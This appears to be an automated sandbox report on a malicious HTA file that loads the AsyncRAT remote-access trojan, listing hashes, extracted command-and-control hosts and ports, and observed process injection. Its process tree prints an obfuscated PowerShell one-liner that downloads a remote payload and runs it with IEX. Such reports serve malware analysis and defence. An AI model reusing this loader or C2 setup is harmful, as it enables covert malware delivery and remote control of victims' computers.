Analysis
-
max time kernel
143s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
06-07-2022 02:22
Static task
static1
Behavioral task
behavioral1
Sample
0eaee4c07ea1b88a8e5d044006b42d41.hta
Resource
win7-20220414-en
General
-
Target
0eaee4c07ea1b88a8e5d044006b42d41.hta
-
Size
1KB
-
MD5
0eaee4c07ea1b88a8e5d044006b42d41
-
SHA1
62fe6a825728c186335fc2a24f24f0608519cdff
-
SHA256
2693749e9e3f7c99543e3e622a335a9db30dc604808f06e3a51f20c33bac8af2
-
SHA512
61ea582878866c4a5ac0cff1cfa4a8e59731396a25df430382bee11eedd4c0d942c81fc8c0d375027f45106e1dcff14910ce63e9a2c5b85451b0bd68e7a1311f
Malware Config
Extracted
https://unimed-corporated.com/updata.jpg
Extracted
asyncrat
| Edit 3LOSH RAT
#_AVAST_#
cdtpitbull.hopto.org:7707
cdtpitbull.hopto.org:4404
cdtpitbull.hopto.org:5505
cdtpitbull.hopto.org:3303
cdtpitbull.hopto.org:2222
cdtpitbull.hopto.org:6606
cdtpitbull.hopto.org:8808
cdtpitbull.hopto.org:5155
cdtpitbull.hopto.org:5122
cdtpitbull.hopto.org:8001
cdtpitbull.hopto.org:9000
cdtpitbull.hopto.org:9999
cdtpitbull.hopto.org:8888
chromedata.accesscam.org:7707
chromedata.accesscam.org:4404
chromedata.accesscam.org:5505
chromedata.accesscam.org:3303
chromedata.accesscam.org:2222
chromedata.accesscam.org:6606
chromedata.accesscam.org:8808
chromedata.accesscam.org:5155
chromedata.accesscam.org:5122
chromedata.accesscam.org:8001
chromedata.accesscam.org:9000
chromedata.accesscam.org:9999
chromedata.accesscam.org:8888
datacontrol.ddns.net:7707
datacontrol.ddns.net:4404
datacontrol.ddns.net:5505
datacontrol.ddns.net:3303
datacontrol.ddns.net:2222
datacontrol.ddns.net:6606
datacontrol.ddns.net:8808
datacontrol.ddns.net:5155
datacontrol.ddns.net:5122
datacontrol.ddns.net:8001
datacontrol.ddns.net:9000
datacontrol.ddns.net:9999
datacontrol.ddns.net:8888
cdt2023.ddns.net:7707
cdt2023.ddns.net:4404
cdt2023.ddns.net:5505
cdt2023.ddns.net:3303
cdt2023.ddns.net:2222
cdt2023.ddns.net:6606
cdt2023.ddns.net:8808
cdt2023.ddns.net:5155
cdt2023.ddns.net:5122
cdt2023.ddns.net:8001
cdt2023.ddns.net:9000
cdt2023.ddns.net:9999
cdt2023.ddns.net:8888
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_file
DesbravadorUpdata.exe
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4384-143-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 17 3672 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3672 set thread context of 4384 3672 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepid process 3672 powershell.exe 3672 powershell.exe 3672 powershell.exe 3672 powershell.exe 3672 powershell.exe 3672 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3672 powershell.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
mshta.exepowershell.exedescription pid process target process PID 4220 wrote to memory of 3672 4220 mshta.exe powershell.exe PID 4220 wrote to memory of 3672 4220 mshta.exe powershell.exe PID 4220 wrote to memory of 3672 4220 mshta.exe powershell.exe PID 3672 wrote to memory of 4608 3672 powershell.exe aspnet_compiler.exe PID 3672 wrote to memory of 4608 3672 powershell.exe aspnet_compiler.exe PID 3672 wrote to memory of 4608 3672 powershell.exe aspnet_compiler.exe PID 3672 wrote to memory of 4500 3672 powershell.exe aspnet_compiler.exe PID 3672 wrote to memory of 4500 3672 powershell.exe aspnet_compiler.exe PID 3672 wrote to memory of 4500 3672 powershell.exe aspnet_compiler.exe PID 3672 wrote to memory of 4384 3672 powershell.exe aspnet_compiler.exe PID 3672 wrote to memory of 4384 3672 powershell.exe aspnet_compiler.exe PID 3672 wrote to memory of 4384 3672 powershell.exe aspnet_compiler.exe PID 3672 wrote to memory of 4384 3672 powershell.exe aspnet_compiler.exe PID 3672 wrote to memory of 4384 3672 powershell.exe aspnet_compiler.exe PID 3672 wrote to memory of 4384 3672 powershell.exe aspnet_compiler.exe PID 3672 wrote to memory of 4384 3672 powershell.exe aspnet_compiler.exe PID 3672 wrote to memory of 4384 3672 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\0eaee4c07ea1b88a8e5d044006b42d41.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow__lo--tri__g'.replace('__','n').replace('--','adS'),[Microsoft.VisualBasic.CallType]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://un').Replace('################','imed-corporated.com/updata.jpg'))|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
-
C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
-
C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/3672-136-0x0000000005E20000-0x0000000005E3E000-memory.dmpFilesize
120KB
-
memory/3672-130-0x0000000000000000-mapping.dmp
-
memory/3672-132-0x0000000004F30000-0x0000000005558000-memory.dmpFilesize
6.2MB
-
memory/3672-133-0x0000000005590000-0x00000000055B2000-memory.dmpFilesize
136KB
-
memory/3672-134-0x00000000056B0000-0x0000000005716000-memory.dmpFilesize
408KB
-
memory/3672-135-0x00000000057D0000-0x0000000005836000-memory.dmpFilesize
408KB
-
memory/3672-131-0x00000000048C0000-0x00000000048F6000-memory.dmpFilesize
216KB
-
memory/3672-137-0x0000000006E80000-0x0000000006F1C000-memory.dmpFilesize
624KB
-
memory/3672-138-0x0000000007950000-0x0000000007FCA000-memory.dmpFilesize
6.5MB
-
memory/3672-139-0x0000000006E40000-0x0000000006E5A000-memory.dmpFilesize
104KB
-
memory/4384-142-0x0000000000000000-mapping.dmp
-
memory/4384-143-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/4500-141-0x0000000000000000-mapping.dmp
-
memory/4608-140-0x0000000000000000-mapping.dmp